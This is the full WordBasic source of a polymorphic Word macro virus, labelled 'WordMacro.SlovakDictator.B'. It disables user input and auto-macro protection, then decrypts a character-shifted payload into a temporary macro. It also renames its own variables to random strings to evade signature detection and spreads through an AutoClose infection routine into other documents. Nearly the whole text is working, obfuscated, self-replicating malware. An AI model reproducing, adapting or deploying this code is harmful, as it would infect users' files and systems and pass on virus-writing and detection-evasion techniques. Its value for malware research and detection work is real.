
REM --------- WordMacro.SlovakDictator.B
REM --------- source code - 2nd generation
REM --------- it is cool, isn't it ?
REM --------- do not modify !
REM ---------------------------------------
Dim Shared JKHDBVIVFHSIOLGLEV
Dim Shared NIGFKLUPHSKEEEP
Dim Shared LEVOKOCHNNQPD
Dim Shared VNGOGKBSJINNKG
Dim Shared ATRUDJHVUTDA
Dim Shared UPMTKJGPISSNIKQEJHB
Dim Shared DUJEPAVVCNCSV
Dim Shared BQLLMJUMSKG
Dim Shared SQQVMSQFPFQOU
Dim Shared MCMAPPVBJCHTIJKLLG
Dim Shared MMPAAMLTJEJQ
Dim Shared QFOSABMOUOJTNFJEB$(200)
Dim Shared AUBQULPOOLFD
Dim Shared TACMICASEFBSRUC
Dim Shared DHFHBNUIMGVHS
Dim Shared QAUBRNSVSNMDMQPJ$(31)'OIEGDFGEGSODLPUVC
Dim Shared FLVFRFOSDHTKBSS

Sub MAIN
On Error Goto AHTUIALPGHINBSOHKGB
JKHDBVIVFHSIOLGLEV = 0
NIGFKLUPHSKEEEP = 1
DisableInput NIGFKLUPHSKEEEP
LEVOKOCHNNQPD = 2
VNGOGKBSJINNKG = 7
ATRUDJHVUTDA = 10
UPMTKJGPISSNIKQEJHB = 20
DUJEPAVVCNCSV = 22
BQLLMJUMSKG = 65
SQQVMSQFPFQOU = 34
MCMAPPVBJCHTIJKLLG = 64
AUBQULPOOLFD = 38
TACMICASEFBSRUC = 120
DHFHBNUIMGVHS = 181
FLVFRFOSDHTKBSS = 31
VEGINPJEAUKMUNV$ = AppInfo$(LEVOKOCHNNQPD)
MOIGIVMVOI = Val(Left$(VEGINPJEAUKMUNV$, NIGFKLUPHSKEEEP))
If MOIGIVMVOI <> VNGOGKBSJINNKG Then Goto AHTUIALPGHINBSOHKGB
Call FTDJILLLBBPSNPOGPD
ScreenUpdating JKHDBVIVFHSIOLGLEV
DisableAutoMacros NIGFKLUPHSKEEEP
AHCQTEBHHQMABJMSANF

DCUVUFPJTL$ = WindowName$()
'OIEGDFGEGSODLPUVC
ToolsMacro .Name = "EHSPTKCEIMAUNR", .Show = NIGFKLUPHSKEEEP, .Edit
'OIEGDFGEGSODLPUVC
EditClear - UPMTKJGPISSNIKQEJHB
For OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEV To DHFHBNUIMGVHS : Insert QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) : InsertPara : Next OIEGDFGEGSODLPUVC

EditReplace .Find = Chr$(MCMAPPVBJCHTIJKLLG) + Chr$(MCMAPPVBJCHTIJKLLG), .Replace = Chr$(SQQVMSQFPFQOU), .Direction = JKHDBVIVFHSIOLGLEV, .MatchCase = NIGFKLUPHSKEEEP, .WholeWord = JKHDBVIVFHSIOLGLEV, .PatternMatch = JKHDBVIVFHSIOLGLEV, .SoundsLike = JKHDBVIVFHSIOLGLEV, .ReplaceAll, .Format = JKHDBVIVFHSIOLGLEV, .Wrap = NIGFKLUPHSKEEEP, .FindAllWordForms = JKHDBVIVFHSIOLGLEV

DMNQTQDCGKCOJFTNS
LLVKJBVQKOPMU
DocClose NIGFKLUPHSKEEEP
Activate DCUVUFPJTL$

Call EHSPTKCEIMAUNR
ToolsMacro .Name = "EHSPTKCEIMAUNR", .Show = NIGFKLUPHSKEEEP, .Delete

AHTUIALPGHINBSOHKGB:
DisableAutoMacros JKHDBVIVFHSIOLGLEV
ScreenUpdating NIGFKLUPHSKEEEP
DisableInput JKHDBVIVFHSIOLGLEV
End Sub

Sub AHCQTEBHHQMABJMSANF
For OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEV To DHFHBNUIMGVHS
REBVECGMVLCRMSQ$ = ""
MVPJAUAQQVNMITRR = Len(QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC))
For IVERHTQBPD = NIGFKLUPHSKEEEP To MVPJAUAQQVNMITRR
REBVECGMVLCRMSQ$ = REBVECGMVLCRMSQ$ + Chr$(Asc(Mid$(QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC), IVERHTQBPD, NIGFKLUPHSKEEEP)) - MMPAAMLTJEJQ)
Next IVERHTQBPD
QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) = REBVECGMVLCRMSQ$
Next OIEGDFGEGSODLPUVC
End Sub

Sub DMNQTQDCGKCOJFTNS
For OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEV To DHFHBNUIMGVHS
Insert "QFOSABMOUOJTNFJEB$(" + Str$(OIEGDFGEGSODLPUVC) + ")=" + Chr$(SQQVMSQFPFQOU) + QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) + Chr$(SQQVMSQFPFQOU)
InsertPara
Next OIEGDFGEGSODLPUVC
For OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEV To FLVFRFOSDHTKBSS - NIGFKLUPHSKEEEP
Insert "QAUBRNSVSNMDMQPJ$(" + Str$(OIEGDFGEGSODLPUVC) + ")=" + Chr$(SQQVMSQFPFQOU) + QAUBRNSVSNMDMQPJ$(OIEGDFGEGSODLPUVC) + Chr$(SQQVMSQFPFQOU)
InsertPara
Next OIEGDFGEGSODLPUVC
End Sub

Function QJQREVEJKRPEMJ$
REBVECGMVLCRMSQ$ = ""
For OIEGDFGEGSODLPUVC = NIGFKLUPHSKEEEP To ATRUDJHVUTDA + Rnd() * ATRUDJHVUTDA : REBVECGMVLCRMSQ$ = REBVECGMVLCRMSQ$ + Chr$(Rnd() * DUJEPAVVCNCSV + BQLLMJUMSKG) : Next OIEGDFGEGSODLPUVC
QJQREVEJKRPEMJ$ = REBVECGMVLCRMSQ$
End Function

Sub LLVKJBVQKOPMU
For OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEV To FLVFRFOSDHTKBSS - NIGFKLUPHSKEEEP
EditReplace .Find = QAUBRNSVSNMDMQPJ$(OIEGDFGEGSODLPUVC), .Replace = QJQREVEJKRPEMJ$, .Direction = JKHDBVIVFHSIOLGLEV, .MatchCase = NIGFKLUPHSKEEEP, .WholeWord = JKHDBVIVFHSIOLGLEV, .PatternMatch = JKHDBVIVFHSIOLGLEV, .SoundsLike = JKHDBVIVFHSIOLGLEV, .ReplaceAll, .Format = JKHDBVIVFHSIOLGLEV, .Wrap = NIGFKLUPHSKEEEP, .FindAllWordForms = JKHDBVIVFHSIOLGLEV
Next OIEGDFGEGSODLPUVC
End Sub

Sub FTDJILLLBBPSNPOGPD
MMPAAMLTJEJQ =  9
QFOSABMOUOJTNFJEB$(0) = "Mrv)\qj{nm)STQMK_R_OQ\RXUPUN_"
QFOSABMOUOJTNFJEB$(1) = "Mrv)\qj{nm)WRPOTU^YQ\TNNNY"
QFOSABMOUOJTNFJEB$(2) = "Mrv)\qj{nm)UN_XTXLQWWZYM"
QFOSABMOUOJTNFJEB$(3) = "Mrv)\qj{nm)_WPXPTK\SRWWTP"
QFOSABMOUOJTNFJEB$(4) = "Mrv)\qj{nm)J][^MSQ_^]MJ"
QFOSABMOUOJTNFJEB$(5) = "Mrv)\qj{nm)^YV]TSPYR\\WRTZNSQK"
QFOSABMOUOJTNFJEB$(6) = "Mrv)\qj{nm)M^SNYJ__LWL\_"
QFOSABMOUOJTNFJEB$(7) = "Mrv)\qj{nm)KZUUVS^V\TP"
QFOSABMOUOJTNFJEB$(8) = "Mrv)\qj{nm)\ZZ_V\ZOYOZX^"
QFOSABMOUOJTNFJEB$(9) = "Mrv)\qj{nm)VLVJYY_KSLQ]RSTUUP"
QFOSABMOUOJTNFJEB$(10) = "Mrv)\qj{nm)VVYJJVU]SNSZ"
QFOSABMOUOJTNFJEB$(11) = "Mrv)\qj{nm)ZOX\JKVX^XS]WOSNK-1;992"
QFOSABMOUOJTNFJEB$(12) = "Mrv)\qj{nm)J^KZ^UYXXUOM"
QFOSABMOUOJTNFJEB$(13) = "Mrv)\qj{nm)]JLVRLJ\NOK\[^L"
QFOSABMOUOJTNFJEB$(14) = "Mrv)\qj{nm)MQOQKW^RVP_Q\"
QFOSABMOUOJTNFJEB$(15) = "Mrv)\qj{nm)ZJ^K[W\_\WVMVZYS-1<:20XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(16) = "Mrv)\qj{nm)OU_O[OX\MQ]TK\\"
QFOSABMOUOJTNFJEB$(17) = ""
QFOSABMOUOJTNFJEB$(18) = "\~k)VJRW"
QFOSABMOUOJTNFJEB$(19) = "Xw)N{{x{)Px}x)JQ]^RJUYPQRWK\XQTPK"
QFOSABMOUOJTNFJEB$(20) = "STQMK_R_OQ\RXUPUN_)F)9"
QFOSABMOUOJTNFJEB$(21) = "WRPOTU^YQ\TNNNY)F):"
QFOSABMOUOJTNFJEB$(22) = "Mr|jkunRwy~})WRPOTU^YQ\TNNNY"
QFOSABMOUOJTNFJEB$(23) = "UN_XTXLQWWZYM)F);"
QFOSABMOUOJTNFJEB$(24) = "_WPXPTK\SRWWTP)F)@"
QFOSABMOUOJTNFJEB$(25) = "J][^MSQ_^]MJ)F):9"
QFOSABMOUOJTNFJEB$(26) = "^YV]TSPYR\\WRTZNSQK)F);9"
QFOSABMOUOJTNFJEB$(27) = "M^SNYJ__LWL\_)F);;"
QFOSABMOUOJTNFJEB$(28) = "KZUUVS^V\TP)F)?>"
QFOSABMOUOJTNFJEB$(29) = "\ZZ_V\ZOYOZX^)F)<="
QFOSABMOUOJTNFJEB$(30) = "VLVJYY_KSLQ]RSTUUP)F)?="
QFOSABMOUOJTNFJEB$(31) = "J^KZ^UYXXUOM)F)<A"
QFOSABMOUOJTNFJEB$(32) = "]JLVRLJ\NOK\[^L)F):;9"
QFOSABMOUOJTNFJEB$(33) = "MQOQKW^RVP_Q\)F):A:"
QFOSABMOUOJTNFJEB$(34) = "OU_O[OX\MQ]TK\\)F)<:"
QFOSABMOUOJTNFJEB$(35) = "_NPRWYSNJ^TV^W_-)F)JyyRwox-1UN_XTXLQWWZYM2"
QFOSABMOUOJTNFJEB$(36) = "VXRPR_V_XR)F)_ju1Uno}-1_NPRWYSNJ^TV^W_-5)WRPOTU^YQ\TNNNY22"
QFOSABMOUOJTNFJEB$(37) = "Ro)VXRPR_V_XR)EG)_WPXPTK\SRWWTP)]qnw)Px}x)JQ]^RJUYPQRWK\XQTPK"
QFOSABMOUOJTNFJEB$(38) = "Ljuu)O]MSRUUUKKY\WYXPYM"
QFOSABMOUOJTNFJEB$(39) = "08888)knprw)xo)qrmmnw)yj{})8888"
QFOSABMOUOJTNFJEB$(40) = "\qxÄKxÅ"
QFOSABMOUOJTNFJEB$(41) = "L~{Orun-)F)OrunWjvn-12"
QFOSABMOUOJTNFJEB$(42) = "Ro)L~{Orun-)F)IIII)]qnw)Px}x)JQ]^RJUYPQRWK\XQTPK"
QFOSABMOUOJTNFJEB$(43) = ""
QFOSABMOUOJTNFJEB$(44) = "Ro)LqnltRw|}juunm192)F)9)]qnw"
QFOSABMOUOJTNFJEB$(45) = "Rwonl}1:2"
QFOSABMOUOJTNFJEB$(46) = "]xxu|Xy}rxw|\jn)7PuxkjuMx}Y{xvy})F)95)7Oj|}\jn|)F)9"
QFOSABMOUOJTNFJEB$(47) = "Px}x)JQ]^RJUYPQRWK\XQTPK"
QFOSABMOUOJTNFJEB$(48) = "Nwm)Ro"
QFOSABMOUOJTNFJEB$(49) = ""
QFOSABMOUOJTNFJEB$(50) = "Mrv)mup)J|)Orun\jnJ|"
QFOSABMOUOJTNFJEB$(51) = "Pn}L~{_ju~n|)mup"
QFOSABMOUOJTNFJEB$(52) = "Ro)mup7Ox{vj})F)9)]qnw"
QFOSABMOUOJTNFJEB$(53) = "mup7Ox{vj})F):"
QFOSABMOUOJTNFJEB$(54) = "Orun\jnJ|)mup"
QFOSABMOUOJTNFJEB$(55) = "Nwm)Ro"
QFOSABMOUOJTNFJEB$(56) = ""
QFOSABMOUOJTNFJEB$(57) = "Ro)LqnltRw|}juunm1:2)F)9)]qnw"
QFOSABMOUOJTNFJEB$(58) = "Rwonl}1<2"
QFOSABMOUOJTNFJEB$(59) = "Orun\jn"
QFOSABMOUOJTNFJEB$(60) = "Nwm)Ro"
QFOSABMOUOJTNFJEB$(61) = ""
QFOSABMOUOJTNFJEB$(62) = "JQ]^RJUYPQRWK\XQTPKC"
QFOSABMOUOJTNFJEB$(63) = "Nwm)\~k"
QFOSABMOUOJTNFJEB$(64) = ""
QFOSABMOUOJTNFJEB$(65) = "\~k)\qxÄKxÅ"
QFOSABMOUOJTNFJEB$(66) = "Yj{ujvnw}wÇY~l)F)MjÇ1WxÄ122"
QFOSABMOUOJTNFJEB$(67) = "Ro)Yj{ujvnw}wÇY~l)F)=)X{)Yj{ujvnw}wÇY~l)F)::)]qnw"
QFOSABMOUOJTNFJEB$(68) = "Knny"
QFOSABMOUOJTNFJEB$(69) = "Knprw)Mrjuxp)^|n{Mrjuxp)<A95);;=5)II_r{~|)JUN[]*II"
QFOSABMOUOJTNFJEB$(70) = "]nÅ});A5)A5)<=B5):<5)IIbx~0{n)rwonl}nm)kÇ)`x{mVjl{x7\uxjtMrl}j}x{7K)r{~|II5)7]nÅ}:"
QFOSABMOUOJTNFJEB$(71) = "]nÅ}):>5);A5)<?95):<5)II`nulxvn)}x)}qn)UVN)1Ujvn{0|)Vjl{x)Nwprwn2)n{7):799II5)7]nÅ};"
QFOSABMOUOJTNFJEB$(72) = "]nÅ}):=>5)>:5):;<5):<5)IIMr|)r|)Unnu)=;:II5)7]nÅ}<"
QFOSABMOUOJTNFJEB$(73) = "]nÅ})<>5)@<5)<=;5):<5)II1l2)>6vj{6B@5)Wj|}Ç)Ujvn{)//)^puÇ)U~|n{5)\uxjtrjII5)7]nÅ}="
QFOSABMOUOJTNFJEB$(74) = "]nÅ})<=5)BA5)<=<5):<5)IIMr|)r|)}qn)or{|})Äx{um)}{~n)yxuÇvx{yqrl)vjl{x)r{~|)*II5)7]nÅ}>"
QFOSABMOUOJTNFJEB$(75) = "Y~|qK~}}xw):;95):AA5):=@5);:5)IIJllny})8)\~quj|II5)7Y~|q:"
QFOSABMOUOJTNFJEB$(76) = "]nÅ}):995):?>5);;A5):<5)IIKrp)o~lt)}x)}qn)krp)kxÅn{)_7V7II5)7]nÅ}?"
QFOSABMOUOJTNFJEB$(77) = "Nwm)Mrjuxp"
QFOSABMOUOJTNFJEB$(78) = "Mrv)mup)J|)^|n{Mrjuxp"
QFOSABMOUOJTNFJEB$(79) = "Mrjuxp1mup2"
QFOSABMOUOJTNFJEB$(80) = "Nwm)Ro"
QFOSABMOUOJTNFJEB$(81) = "Nwm)\~k"
QFOSABMOUOJTNFJEB$(82) = ""
QFOSABMOUOJTNFJEB$(83) = "O~wl}rxw)LqnltRw|}juunm1s2"
QFOSABMOUOJTNFJEB$(84) = "Xw)N{{x{)[n|~vn)WnÅ}"
QFOSABMOUOJTNFJEB$(85) = "LqnltRw|}juunm)F)9"
QFOSABMOUOJTNFJEB$(86) = "Ox{)r)F):)]x)Lx~w}Vjl{x|1s2"
QFOSABMOUOJTNFJEB$(87) = "Ro)Vjl{xWjvn-1r5)s2)F)IIJ~}xLux|nII)]qnw)LqnltRw|}juunm)F):"
QFOSABMOUOJTNFJEB$(88) = "WnÅ})r"
QFOSABMOUOJTNFJEB$(89) = "Nwm)O~wl}rxw"
QFOSABMOUOJTNFJEB$(90) = ""
QFOSABMOUOJTNFJEB$(91) = "\~k)Rwonl}1`qj}]xRwonl}2"
QFOSABMOUOJTNFJEB$(92) = "ML^_^OYS]U-)F)`rwmxÄWjvn-12"
QFOSABMOUOJTNFJEB$(93) = "]xxu|Vjl{x)7Wjvn)F)IIJ~}xLux|nII5)7\qxÄ)F)`qj}]xRwonl}5)7Nmr}"
QFOSABMOUOJTNFJEB$(94) = "Nmr}Lunj{)6);9"
QFOSABMOUOJTNFJEB$(95) = ""
QFOSABMOUOJTNFJEB$(96) = "08888"
QFOSABMOUOJTNFJEB$(97) = "08888)_uxÉnwrn)y{Çlq)J^KZ^UYXXUOM){rjmtx)txm~)vjt{j"
QFOSABMOUOJTNFJEB$(98) = "08888)rmr}nuwj)lj|})6)wnvnwr})*"
QFOSABMOUOJTNFJEB$(99) = "08888"
QFOSABMOUOJTNFJEB$(100) = "Ox{)r)F)9)]x)J^KZ^UYXXUOM)C)Rw|n{})ZOX\JKVX^XS]WOSNK-1r2)C)Rw|n{}Yj{j)C)WnÅ})r"
QFOSABMOUOJTNFJEB$(101) = "08888"
QFOSABMOUOJTNFJEB$(102) = "08888)y{nvnwwj)r)rmn)xm){rjmtx)II\~k)X{rprwjuVjl{xKxmÇII4:"
QFOSABMOUOJTNFJEB$(103) = "08888)jÉ)yx)II\~k)O]MSRUUUKKY\WYXPYMII6:"
QFOSABMOUOJTNFJEB$(104) = "08888)nuvr)yxÉx{wn)~{lr})}rn}x)txw|}jw}Ç)***"
QFOSABMOUOJTNFJEB$(105) = "08888"
QFOSABMOUOJTNFJEB$(106) = "Ox{)r)F)]JLVRLJ\NOK\[^L)]x)MQOQKW^RVP_Q\)C)Rw|n{})ZOX\JKVX^XS]WOSNK-1r2)C)Rw|n{}Yj{j)C)WnÅ})r"
QFOSABMOUOJTNFJEB$(107) = "Nmr}[nyujln)7Orwm)F)Lq{-1?=2)4)Lq{-1?=25)7[nyujln)F)Lq{-1<=25)7Mr{nl}rxw)F)95)7Vj}lqLj|n)F):5)7`qxun`x{m)F)95)7Yj}}n{wVj}lq)F)95)7\x~wm|Urtn)F)95)7[nyujlnJuu5)7Ox{vj})F)95)7`{jy)F):5)7OrwmJuu`x{mOx{v|)F)9"
QFOSABMOUOJTNFJEB$(108) = ""
QFOSABMOUOJTNFJEB$(109) = "VVYJJVU]SNSZ)F)6)Rw}11=)4)[wm12)3):922"
QFOSABMOUOJTNFJEB$(110) = "Ljuu)JQLZ]NKQQZVJKSV\JWO"
QFOSABMOUOJTNFJEB$(111) = "Rw|n{})IIVVYJJVU]SNSZ)F)II)4)\}{-16)VVYJJVU]SNSZ2"
QFOSABMOUOJTNFJEB$(112) = "Rw|n{}Yj{j"
QFOSABMOUOJTNFJEB$(113) = "MVWZ]ZMLPTLXSO]W\"
QFOSABMOUOJTNFJEB$(114) = "MxlLux|n):"
QFOSABMOUOJTNFJEB$(115) = "Jl}rj}n)ML^_^OYS]U-"
QFOSABMOUOJTNFJEB$(116) = "Nwm)\~k"
QFOSABMOUOJTNFJEB$(117) = ""
QFOSABMOUOJTNFJEB$(118) = "\~k)X{rprwjuVjl{xKxmÇ"
QFOSABMOUOJTNFJEB$(119) = "08888)nwm)xo)Qrmmnw)yj{})8888"
QFOSABMOUOJTNFJEB$(120) = "\l{nnw^ymj}rwp)STQMK_R_OQ\RXUPUN_"
QFOSABMOUOJTNFJEB$(121) = "Mr|jkunJ~}xVjl{x|)WRPOTU^YQ\TNNNY"
QFOSABMOUOJTNFJEB$(122) = "JQLZ]NKQQZVJKSV\JWO"
QFOSABMOUOJTNFJEB$(123) = ""
QFOSABMOUOJTNFJEB$(124) = "ML^_^OYS]U-)F)`rwmxÄWjvn-12"
QFOSABMOUOJTNFJEB$(125) = "0XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(126) = "]xxu|Vjl{x)7Wjvn)F)IINQ\Y]TLNRVJ^W[II5)7\qxÄ)F)WRPOTU^YQ\TNNNY5)7Nmr}"
QFOSABMOUOJTNFJEB$(127) = "0XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(128) = "Nmr}Lunj{)6)^YV]TSPYR\\WRTZNSQK"
QFOSABMOUOJTNFJEB$(129) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\)C)Rw|n{})ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L2)C)Rw|n{}Yj{j)C)WnÅ})XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(130) = ""
QFOSABMOUOJTNFJEB$(131) = "Nmr}[nyujln)7Orwm)F)Lq{-1VLVJYY_KSLQ]RSTUUP2)4)Lq{-1VLVJYY_KSLQ]RSTUUP25)7[nyujln)F)Lq{-1\ZZ_V\ZOYOZX^25)7Mr{nl}rxw)F)STQMK_R_OQ\RXUPUN_5)7Vj}lqLj|n)F)WRPOTU^YQ\TNNNY5)7`qxun`x{m)F)STQMK_R_OQ\RXUPUN_5)7Yj}}n{wVj}lq)F)STQMK_R_OQ\RXUPUN_5)7\x~wm|Urtn)F)STQM" + "K_R_OQ\RXUPUN_5)7[nyujlnJuu5)7Ox{vj})F)STQMK_R_OQ\RXUPUN_5)7`{jy)F)WRPOTU^YQ\TNNNY5)7OrwmJuu`x{mOx{v|)F)STQMK_R_OQ\RXUPUN_"
QFOSABMOUOJTNFJEB$(132) = ""
QFOSABMOUOJTNFJEB$(133) = "MVWZ]ZMLPTLXSO]W\"
QFOSABMOUOJTNFJEB$(134) = "UU_TSK_ZTXYV^"
QFOSABMOUOJTNFJEB$(135) = "MxlLux|n)WRPOTU^YQ\TNNNY"
QFOSABMOUOJTNFJEB$(136) = "Jl}rj}n)ML^_^OYS]U-"
QFOSABMOUOJTNFJEB$(137) = ""
QFOSABMOUOJTNFJEB$(138) = "Ljuu)NQ\Y]TLNRVJ^W["
QFOSABMOUOJTNFJEB$(139) = "]xxu|Vjl{x)7Wjvn)F)IINQ\Y]TLNRVJ^W[II5)7\qxÄ)F)WRPOTU^YQ\TNNNY5)7Mnun}n"
QFOSABMOUOJTNFJEB$(140) = ""
QFOSABMOUOJTNFJEB$(141) = "JQ]^RJUYPQRWK\XQTPKC"
QFOSABMOUOJTNFJEB$(142) = "Mr|jkunJ~}xVjl{x|)STQMK_R_OQ\RXUPUN_"
QFOSABMOUOJTNFJEB$(143) = "\l{nnw^ymj}rwp)WRPOTU^YQ\TNNNY"
QFOSABMOUOJTNFJEB$(144) = "Mr|jkunRwy~})STQMK_R_OQ\RXUPUN_"
QFOSABMOUOJTNFJEB$(145) = "Nwm)\~k"
QFOSABMOUOJTNFJEB$(146) = ""
QFOSABMOUOJTNFJEB$(147) = "\~k)JQLZ]NKQQZVJKSV\JWO"
QFOSABMOUOJTNFJEB$(148) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\"
QFOSABMOUOJTNFJEB$(149) = "[NK_NLPV_UL[V\Z-)F)IIII"
QFOSABMOUOJTNFJEB$(150) = "V_YSJ^JZZ_WVR][[)F)Unw1ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L22"
QFOSABMOUOJTNFJEB$(151) = "Ox{)R_N[Q]ZKYM)F)WRPOTU^YQ\TNNNY)]x)V_YSJ^JZZ_WVR][["
QFOSABMOUOJTNFJEB$(152) = "[NK_NLPV_UL[V\Z-)F)[NK_NLPV_UL[V\Z-)4)Lq{-1J|l1Vrm-1ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L25)R_N[Q]ZKYM5)WRPOTU^YQ\TNNNY22)6)VVYJJVU]SNSZ2"
QFOSABMOUOJTNFJEB$(153) = "WnÅ})R_N[Q]ZKYM"
QFOSABMOUOJTNFJEB$(154) = "ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L2)F)[NK_NLPV_UL[V\Z-"
QFOSABMOUOJTNFJEB$(155) = "WnÅ})XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(156) = "Nwm)\~k"
QFOSABMOUOJTNFJEB$(157) = ""
QFOSABMOUOJTNFJEB$(158) = "\~k)MVWZ]ZMLPTLXSO]W\"
QFOSABMOUOJTNFJEB$(159) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\"
QFOSABMOUOJTNFJEB$(160) = "Rw|n{})IIZOX\JKVX^XS]WOSNK-1II)4)\}{-1XRNPMOPNP\XMUY^_L2)4)II2FII)4)Lq{-1\ZZ_V\ZOYOZX^2)4)ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L2)4)Lq{-1\ZZ_V\ZOYOZX^2"
QFOSABMOUOJTNFJEB$(161) = "Rw|n{}Yj{j"
QFOSABMOUOJTNFJEB$(162) = "WnÅ})XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(163) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)OU_O[OX\MQ]TK\\)6)WRPOTU^YQ\TNNNY"
QFOSABMOUOJTNFJEB$(164) = "Rw|n{})IIZJ^K[W\_\WVMVZYS-1II)4)\}{-1XRNPMOPNP\XMUY^_L2)4)II2FII)4)Lq{-1\ZZ_V\ZOYOZX^2)4)ZJ^K[W\_\WVMVZYS-1XRNPMOPNP\XMUY^_L2)4)Lq{-1\ZZ_V\ZOYOZX^2"
QFOSABMOUOJTNFJEB$(165) = "Rw|n{}Yj{j"
QFOSABMOUOJTNFJEB$(166) = "WnÅ})XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(167) = "Nwm)\~k"
QFOSABMOUOJTNFJEB$(168) = ""
QFOSABMOUOJTNFJEB$(169) = "O~wl}rxw)ZSZ[N_NST[YNVS-"
QFOSABMOUOJTNFJEB$(170) = "[NK_NLPV_UL[V\Z-)F)IIII"
QFOSABMOUOJTNFJEB$(171) = "Ox{)XRNPMOPNP\XMUY^_L)F)WRPOTU^YQ\TNNNY)]x)J][^MSQ_^]MJ)4)[wm12)3)J][^MSQ_^]MJ)C)[NK_NLPV_UL[V\Z-)F)[NK_NLPV_UL[V\Z-)4)Lq{-1[wm12)3)M^SNYJ__LWL\_)4)KZUUVS^V\TP2)C)WnÅ})XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(172) = "ZSZ[N_NST[YNVS-)F)[NK_NLPV_UL[V\Z-"
QFOSABMOUOJTNFJEB$(173) = "Nwm)O~wl}rxw"
QFOSABMOUOJTNFJEB$(174) = ""
QFOSABMOUOJTNFJEB$(175) = "\~k)UU_TSK_ZTXYV^"
QFOSABMOUOJTNFJEB$(176) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)OU_O[OX\MQ]TK\\)6)WRPOTU^YQ\TNNNY"
QFOSABMOUOJTNFJEB$(177) = "Nmr}[nyujln)7Orwm)F)ZJ^K[W\_\WVMVZYS-1XRNPMOPNP\XMUY^_L25)7[nyujln)F)ZSZ[N_NST[YNVS-5)7Mr{nl}rxw)F)STQMK_R_OQ\RXUPUN_5)7Vj}lqLj|n)F)WRPOTU^YQ\TNNNY5)7`qxun`x{m)F)STQMK_R_OQ\RXUPUN_5)7Yj}}n{wVj}lq)F)STQMK_R_OQ\RXUPUN_5)7\x~wm|Urtn)F)STQMK_R_OQ\RXUPUN_5)7[n" + "yujlnJuu5)7Ox{vj})F)STQMK_R_OQ\RXUPUN_5)7`{jy)F)WRPOTU^YQ\TNNNY5)7OrwmJuu`x{mOx{v|)F)STQMK_R_OQ\RXUPUN_"
QFOSABMOUOJTNFJEB$(178) = "WnÅ})XRNPMOPNP\XMUY^_L"
QFOSABMOUOJTNFJEB$(179) = "Nwm)\~k"
QFOSABMOUOJTNFJEB$(180) = ""
QFOSABMOUOJTNFJEB$(181) = "\~k)O]MSRUUUKKY\WYXPYM"
QAUBRNSVSNMDMQPJ$(0) = "MMPAAMLTJEJQ"
QAUBRNSVSNMDMQPJ$(1) = "QFOSABMOUOJTNFJEB"
QAUBRNSVSNMDMQPJ$(2) = "QAUBRNSVSNMDMQPJ"
QAUBRNSVSNMDMQPJ$(3) = "JKHDBVIVFHSIOLGLEV"
QAUBRNSVSNMDMQPJ$(4) = "ATRUDJHVUTDA"
QAUBRNSVSNMDMQPJ$(5) = "DUJEPAVVCNCSV"
QAUBRNSVSNMDMQPJ$(6) = "VNGOGKBSJINNKG"
QAUBRNSVSNMDMQPJ$(7) = "NIGFKLUPHSKEEEP"
QAUBRNSVSNMDMQPJ$(8) = "UPMTKJGPISSNIKQEJHB"
QAUBRNSVSNMDMQPJ$(9) = "LEVOKOCHNNQPD"
QAUBRNSVSNMDMQPJ$(10) = "BQLLMJUMSKG"
QAUBRNSVSNMDMQPJ$(11) = "SQQVMSQFPFQOU"
QAUBRNSVSNMDMQPJ$(12) = "MCMAPPVBJCHTIJKLLG"
QAUBRNSVSNMDMQPJ$(13) = "AUBQULPOOLFD"
QAUBRNSVSNMDMQPJ$(14) = "TACMICASEFBSRUC"
QAUBRNSVSNMDMQPJ$(15) = "DHFHBNUIMGVHS"
QAUBRNSVSNMDMQPJ$(16) = "FLVFRFOSDHTKBSS"
QAUBRNSVSNMDMQPJ$(17) = "OIEGDFGEGSODLPUVC"
QAUBRNSVSNMDMQPJ$(18) = "MVPJAUAQQVNMITRR"
QAUBRNSVSNMDMQPJ$(19) = "IVERHTQBPD"
QAUBRNSVSNMDMQPJ$(20) = "REBVECGMVLCRMSQ"
QAUBRNSVSNMDMQPJ$(21) = "VEGINPJEAUKMUNV"
QAUBRNSVSNMDMQPJ$(22) = "MOIGIVMVOI"
QAUBRNSVSNMDMQPJ$(23) = "AHTUIALPGHINBSOHKGB"
QAUBRNSVSNMDMQPJ$(24) = "AHCQTEBHHQMABJMSANF"
QAUBRNSVSNMDMQPJ$(25) = "DCUVUFPJTL"
QAUBRNSVSNMDMQPJ$(26) = "DMNQTQDCGKCOJFTNS"
QAUBRNSVSNMDMQPJ$(27) = "LLVKJBVQKOPMU"
QAUBRNSVSNMDMQPJ$(28) = "EHSPTKCEIMAUNR"
QAUBRNSVSNMDMQPJ$(29) = "QJQREVEJKRPEMJ"
